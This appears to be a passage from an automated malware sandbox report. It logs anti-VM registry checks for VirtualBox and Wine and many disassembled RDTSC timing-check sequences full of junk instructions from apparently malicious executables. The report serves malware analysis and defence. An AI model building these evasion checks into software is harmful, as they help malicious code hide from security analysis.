                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF4B4 second address: 4FF4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF4B8 second address: 4FF4EC instructions: 0x00000000 rdtsc 0x00000002 js 00007F6254B873E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F6254B873F5h 0x00000014 jmp 00007F6254B873EFh 0x00000019 popad 0x0000001a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF4EC second address: 4FF4F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF4F3 second address: 4FED4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D29EDh], esi 0x0000000e push dword ptr [ebp+122D0049h] 0x00000014 pushad 0x00000015 push ecx 0x00000016 jmp 00007F6254B873F8h 0x0000001b pop ebx 0x0000001c jl 00007F6254B873E9h 0x00000022 popad 0x00000023 call dword ptr [ebp+122D1D6Bh] 0x00000029 pushad 0x0000002a pushad 0x0000002b mov dx, C5F3h 0x0000002f jmp 00007F6254B873F9h 0x00000034 popad 0x00000035 xor eax, eax 0x00000037 mov dword ptr [ebp+122D28ABh], edx 0x0000003d jns 00007F6254B873F0h 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 jnc 00007F6254B873ECh 0x0000004d mov dword ptr [ebp+122D39A8h], eax 0x00000053 jmp 00007F6254B873F5h 0x00000058 mov esi, 0000003Ch 0x0000005d mov dword ptr [ebp+122D29EDh], ecx 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 or dword ptr [ebp+122D28ABh], edi 0x0000006d lodsw 0x0000006f jnl 00007F6254B873EDh 0x00000075 cmc 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a jmp 00007F6254B873F1h 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 pushad 0x00000084 xor bx, 0D58h 0x00000089 jno 00007F6254B873E7h 0x0000008f popad 0x00000090 nop 0x00000091 push eax 0x00000092 push edx 0x00000093 jg 00007F6254B873E8h 0x00000099 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FED4E second address: 4FED65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F6254D230B6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6843EF second address: 6843F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6843F3 second address: 6843F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6836A7 second address: 6836AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683805 second address: 683809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683809 second address: 68380D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68380D second address: 683821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F6254D230B6h 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683821 second address: 683825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683825 second address: 68384F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jns 00007F6254D230D6h 0x0000000f push esi 0x00000010 jmp 00007F6254D230C6h 0x00000015 pop esi 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683AB0 second address: 683ABA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6254B873E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683ABA second address: 683AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683AC0 second address: 683AE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F6254B873F4h 0x0000000a jo 00007F6254B873E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683AE1 second address: 683AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683AF2 second address: 683AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683AF8 second address: 683B10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683B10 second address: 683B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6254B873E6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683B1A second address: 683B24 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6254D230B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683B24 second address: 683B29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683B29 second address: 683B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254D230BBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 683CB1 second address: 683CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685583 second address: 685593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6254D230BCh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6855DF second address: 6855FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jns 00007F6254B873E8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F6254B873ECh 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6855FC second address: 685698 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6254D230CDh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D1DA7h], edi 0x00000011 push 00000000h 0x00000013 mov esi, dword ptr [ebp+122D3B18h] 0x00000019 call 00007F6254D230B9h 0x0000001e jnl 00007F6254D230CAh 0x00000024 push eax 0x00000025 jc 00007F6254D230BAh 0x0000002b push ebx 0x0000002c pushad 0x0000002d popad 0x0000002e pop ebx 0x0000002f mov eax, dword ptr [esp+04h] 0x00000033 push esi 0x00000034 jmp 00007F6254D230C0h 0x00000039 pop esi 0x0000003a mov eax, dword ptr [eax] 0x0000003c pushad 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 push edx 0x00000041 pop edx 0x00000042 popad 0x00000043 jmp 00007F6254D230C5h 0x00000048 popad 0x00000049 mov dword ptr [esp+04h], eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685736 second address: 685744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685744 second address: 68576E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F6254D230C0h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 jmp 00007F6254D230BAh 0x00000019 pop ebx 0x0000001a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68576E second address: 6857C8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov dword ptr [ebp+122D1D16h], edx 0x0000000f lea ebx, dword ptr [ebp+1245A4B2h] 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F6254B873E8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f pushad 0x00000030 mov di, 3DECh 0x00000034 mov edx, dword ptr [ebp+122D1E76h] 0x0000003a popad 0x0000003b push eax 0x0000003c push esi 0x0000003d pushad 0x0000003e jmp 00007F6254B873F8h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6858D7 second address: 6858FB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6254D230BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6254D230BDh 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685A29 second address: 685A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 697DC3 second address: 697DC8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 697DC8 second address: 697DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jmp 00007F6254B873F6h 0x00000010 pop eax 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 697DEA second address: 697DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7B20 second address: 6A7B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7B28 second address: 6A7B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7B2E second address: 6A7B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A7B32 second address: 6A7B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5AC1 second address: 6A5AD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F6254B87427h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5AD1 second address: 6A5AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254D230C7h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5AEC second address: 6A5AF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5AF0 second address: 6A5B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254D230BAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jng 00007F6254D230B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5D6C second address: 6A5D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 jbe 00007F6254B873E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6022 second address: 6A6028 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6028 second address: 6A602F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A69FF second address: 6A6A19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6A19 second address: 6A6A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254B873F8h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6A3E second address: 6A6A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6B93 second address: 6A6BB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6254B873F9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6BB6 second address: 6A6BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F4DA second address: 66F4F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6D0F second address: 6A6D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6D13 second address: 6A6D2B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F6254B873F2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A76CE second address: 6A76F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F6254D230B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F6254D230B8h 0x00000014 push ebx 0x00000015 jmp 00007F6254D230BCh 0x0000001a pop ebx 0x0000001b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A76F2 second address: 6A76FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A76FA second address: 6A76FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B146C second address: 6B1470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1470 second address: 6B1484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F6254D230B6h 0x0000000e ja 00007F6254D230B6h 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B1484 second address: 6B1488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E425 second address: 67E42D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E42D second address: 67E435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E435 second address: 67E43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4168 second address: 6B4176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254B873EAh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4176 second address: 6B417C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 675EFF second address: 675F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F6254B873EBh 0x00000013 popad 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7BDB second address: 6B7BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7BDF second address: 6B7BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7BE3 second address: 6B7BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7DB5 second address: 6B7DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8809 second address: 6B880F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B88C7 second address: 6B88CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B88CB second address: 6B88F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jg 00007F6254D230C8h 0x0000000d xchg eax, ebx 0x0000000e sub dword ptr [ebp+122D2061h], edi 0x00000014 push eax 0x00000015 pushad 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B88F6 second address: 6B8903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F6254B873E6h 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BAF1B second address: 6BAF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA71E second address: 6BA722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BAF1F second address: 6BAF2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA722 second address: 6BA72C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6254B873E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BAF2E second address: 6BAF7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add si, E060h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F6254D230B8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d and edi, dword ptr [ebp+122D1EF5h] 0x00000033 push 00000000h 0x00000035 xor si, DBBBh 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push esi 0x0000003e pushad 0x0000003f popad 0x00000040 pop esi 0x00000041 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB917 second address: 6BB925 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB925 second address: 6BB92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE6A4 second address: 6BE6AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BC305 second address: 6BC30A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BC30A second address: 6BC31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 je 00007F6254B873ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C2CE9 second address: 6C2CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
